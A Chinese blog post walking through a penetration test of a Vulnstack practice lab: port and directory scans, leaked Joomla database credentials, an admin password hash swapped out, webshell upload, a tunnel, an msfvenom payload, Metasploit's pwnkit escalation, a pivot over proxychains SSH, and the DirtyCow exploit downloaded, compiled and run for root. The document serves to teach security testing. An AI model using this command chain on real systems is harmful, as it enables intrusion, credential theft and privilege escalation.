vulnstack内网靶场渗透测试

于 2024-03-19 20:09:15 发布
阅读量634 收藏 28
点赞数 32
分类专栏: 靶场渗透 文章标签: python tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/three_1996/article/details/136853703
版权

一、主机扫描(靶场开放端口与服务、主机操作系统与版本)

(一) nmap -sT 192.168.101.1/24

Nmap scan report for 192.168.101.150
Host is up (0.0010s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)

(二) nmap -A 192.168.101.150

开放端口与软件版本
22/tcp   open  ssh     OpenSSH 5.3 (protocol 2.0)
80/tcp   open  http    nginx 1.9.4
3306/tcp open  mysql   MySQL 5.7.27-0ubuntu0.16.04.1
操作系统版本
MAC Address: 00:0C:29:32:46:C9 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10

二、web扫描(域名与url路径、常规漏洞)

(一) dirb http://192.168.101.150

---- Scanning URL: http://192.168.101.150/ ----
==> DIRECTORY: http://192.168.101.150/administrator/
==> DIRECTORY: http://192.168.101.150/bin/
==> DIRECTORY: http://192.168.101.150/cache/
==> DIRECTORY: http://192.168.101.150/components/
==> DIRECTORY: http://192.168.101.150/images/
==> DIRECTORY: http://192.168.101.150/includes/

http://192.168.101.150/index.php (CODE:200|SIZE:16031)
==> DIRECTORY: http://192.168.101.150/language/
==> DIRECTORY: http://192.168.101.150/layouts/
==> DIRECTORY: http://192.168.101.150/libraries/
==> DIRECTORY: http://192.168.101.150/media/
==> DIRECTORY: http://192.168.101.150/modules/
==> DIRECTORY: http://192.168.101.150/plugins/
http://192.168.101.150/robots.txt (CODE:200|SIZE:829)
http://192.168.101.150/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.101.150/templates/
==> DIRECTORY: http://192.168.101.150/tmp/

---- Entering directory: http://192.168.101.150/administrator/ ----
==> DIRECTORY: http://192.168.101.150/administrator/cache/
==> DIRECTORY: http://192.168.101.150/administrator/components/
==> DIRECTORY: http://192.168.101.150/administrator/help/
==> DIRECTORY: http://192.168.101.150/administrator/includes/

http://192.168.101.150/administrator/index.php (CODE:200|SIZE:5005)
==> DIRECTORY: http://192.168.101.150/administrator/language/
==> DIRECTORY: http://192.168.101.150/administrator/logs/
==> DIRECTORY: http://192.168.101.150/administrator/modules/
==> DIRECTORY: http://192.168.101.150/administrator/templates/

---- Entering directory: http://192.168.101.150/bin/ ----
+ http://192.168.101.150/bin/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/cache/ ----
+ http://192.168.101.150/cache/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/components/ ----
+ http://192.168.101.150/components/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/images/ ----
==> DIRECTORY: http://192.168.101.150/images/banners/
==> DIRECTORY: http://192.168.101.150/images/headers/

http://192.168.101.150/images/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/includes/ ----
+ http://192.168.101.150/includes/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/language/ ----
+ http://192.168.101.150/language/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/layouts/ ----
+ http://192.168.101.150/layouts/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/layouts/joomla/
==> DIRECTORY: http://192.168.101.150/layouts/libraries/
==> DIRECTORY: http://192.168.101.150/layouts/plugins/

---- Entering directory: http://192.168.101.150/libraries/ ----
==> DIRECTORY: http://192.168.101.150/libraries/cms/

http://192.168.101.150/libraries/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/libraries/joomla/
==> DIRECTORY: http://192.168.101.150/libraries/legacy/
==> DIRECTORY: http://192.168.101.150/libraries/src/
==> DIRECTORY: http://192.168.101.150/libraries/vendor/

---- Entering directory: http://192.168.101.150/media/ ----
==> DIRECTORY: http://192.168.101.150/media/cms/
==> DIRECTORY: http://192.168.101.150/media/contacts/
==> DIRECTORY: http://192.168.101.150/media/editors/

http://192.168.101.150/media/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/media/mailto/
==> DIRECTORY: http://192.168.101.150/media/media/
==> DIRECTORY: http://192.168.101.150/media/system/

---- Entering directory: http://192.168.101.150/modules/ ----
+ http://192.168.101.150/modules/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/plugins/ ----
==> DIRECTORY: http://192.168.101.150/plugins/authentication/
==> DIRECTORY: http://192.168.101.150/plugins/captcha/
==> DIRECTORY: http://192.168.101.150/plugins/content/
==> DIRECTORY: http://192.168.101.150/plugins/editors/
==> DIRECTORY: http://192.168.101.150/plugins/extension/
==> DIRECTORY: http://192.168.101.150/plugins/fields/

http://192.168.101.150/plugins/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/plugins/installer/
==> DIRECTORY: http://192.168.101.150/plugins/privacy/
==> DIRECTORY: http://192.168.101.150/plugins/search/
==> DIRECTORY: http://192.168.101.150/plugins/system/
==> DIRECTORY: http://192.168.101.150/plugins/user/

---- Entering directory: http://192.168.101.150/templates/ ----
+ http://192.168.101.150/templates/index.html (CODE:200|SIZE:31)
==> DIRECTORY: http://192.168.101.150/templates/system/

---- Entering directory: http://192.168.101.150/tmp/ ----
+ http://192.168.101.150/tmp/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/administrator/cache/ ----
+ http://192.168.101.150/administrator/cache/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/administrator/components/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/administrator/help/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/administrator/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/administrator/language/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/administrator/logs/ ----
+ http://192.168.101.150/administrator/logs/index.html (CODE:200|SIZE:31)

---- Entering directory: http://192.168.101.150/administrator/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/administrator/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/images/banners/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/images/headers/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/layouts/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/layouts/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/layouts/plugins/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/libraries/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/libraries/joomla/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/libraries/legacy/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/libraries/src/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/libraries/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/media/cms/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/media/contacts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/media/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/media/mailto/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/media/media/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/media/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/authentication/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/captcha/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/editors/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/extension/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/fields/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/installer/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/privacy/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/system/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/plugins/user/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/templates/system/ ----
==> DIRECTORY: http://192.168.101.150/templates/system/css/
==> DIRECTORY: http://192.168.101.150/templates/system/html/
==> DIRECTORY: http://192.168.101.150/templates/system/images/

http://192.168.101.150/templates/system/index.php (CODE:200|SIZE:0)

---- Entering directory: http://192.168.101.150/templates/system/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/templates/system/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.101.150/templates/system/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

(二) dirseach -u http://192.168.101.150

[11:12:02] 403 -  280B  - /.configuration.php.swp                           
[11:12:05] 403 -  280B  - /.htaccess.bak1                                   
[11:12:05] 403 -  280B  - /.ht_wsr.txt                                      
[11:12:06] 403 -  280B  - /.htaccess.sample                                 
[11:12:06] 403 -  280B  - /.htaccess.orig
[11:12:06] 403 -  280B  - /.htaccess.save                                   
[11:12:06] 403 -  280B  - /.htaccess_extra                                  
[11:12:06] 403 -  280B  - /.htaccess_sc
[11:12:06] 403 -  280B  - /.htaccessOLD2
[11:12:06] 403 -  280B  - /.htm                                             
[11:12:06] 403 -  280B  - /.htaccessOLD
[11:12:06] 403 -  280B  - /.htaccess_orig
[11:12:06] 403 -  280B  - /.html
[11:12:06] 403 -  280B  - /.htaccessBAK                                     
[11:12:06] 403 -  280B  - /.htpasswds                                       
[11:12:06] 403 -  280B  - /.httr-oauth                                      
[11:12:06] 403 -  280B  - /.htpasswd_test                                   
[11:12:08] 403 -  280B  - /.php                                             
[11:12:13] 200 -   24KB - /1.php                                            
[11:12:13] 200 -    0B  - /2.php                                            
[11:12:38] 301 -  326B  - /administrator  ->  http://192.168.101.150/administrator/
[11:12:39] 200 -  527B  - /administrator/includes/                          
[11:12:39] 200 -   31B  - /administrator/cache/                             
[11:12:39] 301 -  331B  - /administrator/logs  ->  http://192.168.101.150/administrator/logs/
[11:12:39] 200 -   31B  - /administrator/logs/                              
[11:12:39] 200 -    2KB - /administrator/                                   
[11:12:39] 200 -    2KB - /administrator/index.php                          
[11:12:47] 200 -   31B  - /bin/                                             
[11:12:47] 301 -  316B  - /bin  ->  http://192.168.101.150/bin/             
[11:12:49] 200 -   31B  - /cache/                                           
[11:12:49] 301 -  318B  - /cache  ->  http://192.168.101.150/cache/         
[11:12:51] 200 -   31B  - /cli/                                             
[11:12:53] 301 -  323B  - /components  ->  http://192.168.101.150/components/
[11:12:53] 200 -   31B  - /components/                                      
[11:12:55] 200 -    2KB - /configuration.php~                               
[11:12:55] 200 -    0B  - /configuration.php                                
[11:13:21] 200 -    1KB - /htaccess.txt                                     
[11:13:23] 200 -   31B  - /images/                                          
[11:13:23] 301 -  319B  - /images  ->  http://192.168.101.150/images/       
[11:13:24] 200 -   31B  - /includes/                                        
[11:13:24] 301 -  321B  - /includes  ->  http://192.168.101.150/includes/   
[11:13:26] 200 -    3KB - /index.php/login/                                 
[11:13:27] 200 -    4KB - /index.php                                        
[11:13:31] 301 -  321B  - /language  ->  http://192.168.101.150/language/   
[11:13:31] 200 -   31B  - /layouts/                                         
[11:13:32] 301 -  322B  - /libraries  ->  http://192.168.101.150/libraries/ 
[11:13:32] 200 -   31B  - /libraries/                                       
[11:13:32] 200 -    7KB - /LICENSE.txt                                      
[11:13:40] 200 -   31B  - /media/                                           
[11:13:40] 301 -  318B  - /media  ->  http://192.168.101.150/media/         
[11:13:44] 301 -  320B  - /modules  ->  http://192.168.101.150/modules/     
[11:13:44] 200 -   31B  - /modules/                                         
[11:13:58] 301 -  320B  - /plugins  ->  http://192.168.101.150/plugins/     
[11:13:59] 200 -   31B  - /plugins/                                         
[11:14:04] 200 -    2KB - /README.txt                                       
[11:14:06] 200 -  392B  - /robots.txt                                       
[11:14:10] 403 -  280B  - /server-status                                    
[11:14:10] 403 -  280B  - /server-status/                                   
[11:14:24] 200 -   31B  - /templates/                                       
[11:14:24] 301 -  322B  - /templates  ->  http://192.168.101.150/templates/
[11:14:24] 200 -    0B  - /templates/beez3/                                 
[11:14:24] 200 -    0B  - /templates/protostar/                             
[11:14:24] 200 -   31B  - /templates/index.html                             
[11:14:24] 200 -    0B  - /templates/system/                                
[11:14:26] 301 -  316B  - /tmp  ->  http://192.168.101.150/tmp/             
[11:14:26] 200 -   31B  - /tmp/                                             
[11:14:41] 200 -  628B  - /web.config.txt

(三) appscan

(四) acunetix

三、筛选可用目录信息

http://192.168.101.150/1.php

http://192.168.101.150/configuration.php~

http://192.168.101.150/index.php/login/

http://192.168.101.150/administrator/index.php

http://192.168.101.150/templates/system/html/

四、尝试getshell

(一) 通过configuration.php~,发现数据库的账号密码。

public $user = 'testuser';
public $password = 'cvcvgjASD!@';
public $db = 'joomla';
public $dbprefix = 'am2zu_';

(二) 使用Navicat登录数据库,得到系统登录账号,密码无法破解。
使用pyCharm编写一个密码进行替换。

import bcrypt

# 要加密的明文密码
password = '123'

# 将明文密码转换为字节串
password_bytes = password.encode('utf-8')

# 使用bcrypt库的hashpw方法对密码进行哈希加密
hashed = bcrypt.hashpw(password_bytes, bcrypt.gensalt())

# 将哈希密码转换为字符串
hashed_password = hashed.decode('utf-8')

print("加密后的密码:", hashed_password)

(三) 成功登录系统,发现Templates模块可以上传代码/文件。

使用蚁剑登录后发现无法输入命令,使用插件绕过disable_functions。getshell。

五、尝试提权root

(一) 在kali中使用Neo生成木马

python3 neoreg.py generate -k 123456

(二) 将生成的木马文件tunnel.php上传至web服务器后,在kali运行命令:建立正向隧道

python3 neoreg.py -k 123456 -u http://192.168.101.150/templates/beez3/tunnel.php

(三) 在kali中使用msfvenom生成监听文件,将文件上传web并运行等待

msfvenom -p linux/x64/meterpreter/bind_tcp rhost=192.168.93.120 lport=7777 -f elf -o /tmp/muma.elf

(四) 使用msfconsole,配置隧道代理,进行监听。

setg proxies socks5:127.0.0.1:1080

handler -p linux/x64/meterpreter/bind_tcp -H 192.168.93.120 -P 7777

(五) 进入session,使用辅助提权模块批量获取漏洞

run post/multi/recon/local_exploit_suggester

(六) 使用可利用漏洞,获取root权限

use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

六、收集web主机信息与其内网主机信息

uname -a

Linux ubuntu 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

route

Kernel IP routing table

Destination Gateway Genmask Flags Metric Ref Use Iface

192.168.93.0 * 255.255.255.0 U 0 0 0 ens33

arp -a

IP address MAC address Interface

---------- ----------- ---------

192.168.93.100 00:0c:29:32:46:d3 ens33

cat /root/mysql/test.txt

adduser wwwuser

passwd wwwuser_123Aqx

七、提权root后,发现内网账号密码信息,尝试登录

(一) 在kali中配置代理信息

vim /etc/proxychains4.conf
socks5:127.0.0.1:1080

(二) 添加ssh的config文件 vim /root/.ssh/config

Host *

KexAlgorithms +diffie-hellman-group1-sha1

HostkeyAlgorithms +ssh-dss,ssh-rsa

PubkeyAcceptedKeyTypes +ssh-dss,ssh-rsa

Ciphers +aes128-cbc

(三) 使用ssh连接

proxychains ssh wwwuser@192.168.93.100

wwwuser_123Aqx

(四) 连接成功后收集信息,发现系统版本为2.6.32-431.el6.x86_64

(五) 该改本满足脏牛漏洞的影响范围,下载脏牛漏洞进行提权

GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195

wget https://github.com/FireFart/dirtycow       #下载脏牛
gcc -pthread dirty.c -o dirty -lcrypt           #编译
./dirty                                         #执行
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:                  #输入密码
Complete line:
firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash   #漏洞执行成功,自动创建root权限的账号

(六) 切换到firefart用户,提权成功

three_1996
关注
  • 32
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试技术
09-13
渗透技术,请勿用于非法目的,仅用于技术交流。
渗透测试安全学习ppt
02-12
1.内渗透测试 2.安全学习ppt
Vulnstack----1、ATT&CK红队评估实战靶场
七天
08-01 1018
3、敏感目录:http://192.168.144.132/phpMyadmin。4、发现yxcms:http://192.168.144.132/yxcms。192.168.52.143:存在MS17-010。192.168.52.138:存在MS17-010。域用户:dev1、root-tvi862ubeh。win7内ip:192.168.52.143。1、ip地址:192.168.144.132。内ip地址:192.168.52.143。内段:192.168.52.0/24。
VulnStack实战(一)超级实战
weixin_51198941的博客
07-14 715
查看了一下,把敏感信息收集起来,比如站根目录,开启的什么敏感文件,然后我们往下边翻的时候,发现有一个登录框,用常见的弱口令试了一下,发现root,root能登录。当前域名为god,登录用户是administrator,且存在两个卡,分别是192.168.22.133(外)和192.168.52.143(内)net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域。共有三台机器,Win7是对外的web机,Win2003和Win2008(DC)是内机器。
Vulnstack靶场渗透(ATT&CK实战系列-红队评估(七))
DG_s1mple
04-18 6076
这么久没打vulnhub全是因为在吃这一套内靶场(绝对没有在摸鱼 ),现在把我的思路写下来 前言 这是Vulnstack里的一套靶场,ATT&CK实战系列-红队评估(七) 这是靶场的链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 络环境 整个靶场环境一共五个靶机(总共27.8 GB),分别位于三层络环境中: DMZ区IP段为192.168.1.1/24 第二层络环境IP段为192.168.52.1/24 第三层络环境IP段为192
Vulnstack红日安全内渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外打点MySQL写日志GetshellCMS后台上传GetShell内渗透靶机CS后门上线内域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内渗透,本文将学习并记录红日安全团队提供的一个内域环境靶场渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,络拓扑如下: 2、从络拓扑图得知,需要模拟内和外两个段, Win7 虚拟机相当于关服务器,所以需要两张卡,故需要配置两个络适配器(卡),点击
复现红日安全-ATT& CK实战:Vulnstack靶场实战(一)
weixin_51152373的博客
06-14 753
实战环境配置所有主机密码为:hongrisec@2019密码同一修改为:hongrisec@2021攻击机名称: win 10 | kali 2020vm1名称: win 7ip: 外:192.168.154.0内:192.168.52.143vm2名称: win 2003vm3名称: win 2008(域控)络配置Win7服务开启。
安全攻防渗透测试实战指南.pptx
07-01
安全攻防渗透测试实战指南
渗透测试-外链.pdf
05-04
渗透测试-外链.pdf
渗透技术总结大全.pdf
12-22
渗透技术总结大全.pdf
vulnstack(红日)内渗透靶场二: 免杀360拿下域控
xf555er的博客
05-30 2082
当针对内主机使用MSF进行永恒之蓝漏洞攻击失败时,一个替代方案是首先利用frp实现内穿透,然后再进行漏洞利用。这种方法可能会产生意想不到的效果。我原本计划通过Meterpreter的portfwd命令将域控的3389端口映射到kali本地端口,随后使用rdesktop进行远程登录。然而,这一计划并未成功,我推测这可能是因为域控做了某些限制,只允许10.10.10.0/24段的主机进行远程登录。
渗透Vulnstack4靶场的全方位打法
最新发布
xf555er的博客
12-29 1306
MS14-068是一个著名的Windows Kerberos安全漏洞,允许攻击者篡改Kerberos票据,从而获取非法提权。这个漏洞特别影响Windows域控制器,能让攻击者伪造Kerberos票据,获取域内几乎任意账户的权限,包括域管理员权限。这使得攻击者可以在络中随意访问和控制资源。
Vulnstack靶场实战(一)
weixin_46066840的博客
09-13 1451
红日安全实战:Vulnstack靶场实战(一)
记一次Vulnstack靶场渗透(五)
小王的储物间
07-25 435
对于从来没有接触过络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
【内渗透vulnstack第二个靶场
m0_58236911的博客
04-29 424
本文为个人在练习红日安全vulnstack系列的第二个靶场时所写笔记,希望对大家能有所帮助,若有疑问,欢迎提出交流,敬请各位批评指正!进入C:\Oracle\Middleware\user_projects\domains\base_domain目录,也可以使用 CobaltStrike自带的提权插件,提权手段很多这里不举例。右击会话—jump—psexec64(PC为32位,需要使用psexec)模拟外段:192.168.111.0/24。权限维持有多种途径,这里采用的是黄金票据。
渗透vulnstack靶场系列(一)
xf555er的博客
10-18 1915
Vulnstack靶场有两个默认用户, 分别是域成员和域管理员用户, 其默认密码均为首次登录会要求用户修改密码, 除此之外我还新添加了个用户用于登录win2003主机所有的用户信息如下表格所示:下图为卡的配置信息, 配置的子IP为, 设置为仅主机模式下图为NAT模式的卡配置信息, 配置的子IP为域控的络连接配置如下:Web服务器有两个卡, 其中一个卡是用于Web服务器与域内主机进行数据交互, 此卡需将DNS服务器地址设置成域控服务器地址, 其他域内成员的络配置亦是如此, 这里就不详细描述了
vulnstack系列靶场
aming小老弟
06-09 2979
靶场
ATT&CK实战系列-红队评估 (红日靶场3)Vulnstack三层络域渗透靶场
qq_47289634的博客
08-01 983
靶场地址打开虚拟机镜像为挂起状态,第一时间进行快照,部分服务未做自启,重启后无法自动运行。挂起状态,账号已默认登陆,centos为出机,第一次运行,需重新获取桥接模式卡ip。除重新获取ip,不建议进行任何虚拟机操作。参考虚拟机络配置,添加新的络,该络作为内部络。注:名称及段必须符合下面图片,进行了固定ip配置。
安全攻防:渗透测试实战指南 pdf下载
07-29
对于内安全攻防和渗透测试实战指南的PDF下载,首先需要明确渗透测试的目的是为了评估和测试的安全性,找出可能存在的漏洞和风险,并提供相应的防御建议和措施。 在下载PDF之前,我们应该明确以下几个问题: 1. 有合法的授权和使用权限吗? 渗透测试是一项敏感且潜在危险的活动,需要事先与相关当事人保持沟通和达成共识,以确保测试合法、合规和有授权。因此,在下载之前,我们要确保自己拥有相应的合法权限。 2. 评估所需工具和技能 渗透测试需要一定的技术和工具支持。在下载之前,我们需要评估自己是否具备进行渗透测试所需要的技能和经验,并确认自己是否具备所需的工具和环境。 3. 错误使用导致的后果 渗透测试是一项高风险活动,如果错误使用或者测试方法不当,可能导致严重的后果,如业务中断、数据泄露等。因此,在下载之前,我们需要认识到这一点,并确保自己具备相应的安全意识和责任心。 总之,下载内安全攻防和渗透测试实战指南的PDF之前,我们要确保自己拥有合法授权和权限,具备相应的技能和工具,以及清楚认识到错误使用可能导致的后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值